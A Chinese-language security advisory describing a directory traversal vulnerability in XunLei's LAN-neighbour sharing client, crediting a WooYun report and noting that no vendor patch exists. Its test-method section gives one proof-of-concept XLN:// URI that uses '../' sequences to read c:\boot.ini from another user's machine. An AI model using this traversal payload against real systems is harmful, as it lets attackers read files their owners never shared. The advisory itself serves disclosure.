受影响系统:
XunLei 迅雷网邻
描述:
迅雷网邻,即以前的“迅雷邻居”,是迅雷网络开发的提供下载服务客户端软件迅雷7.2里应用市场的一款小软件,用于嗅探局域网内(或者附近)真实邻居,实现资源快速下载。具有精确定位、智能搜索、动态提醒等功能。
迅雷网邻在实现上存在目录遍历漏洞,远程攻击者可利用此漏洞下载对方未共享的任意文件。
<*来源:papaya
链接:http://www.wooyun.org/bugs/wooyun-2010-03475
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
XLN://ykz-20090321XPO#00225F4F5066FLTQ/TDDOWNLOAD/RBD-316/../../../../../../c:\boot.ini
建议:
厂商补丁:
XunLei
——
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。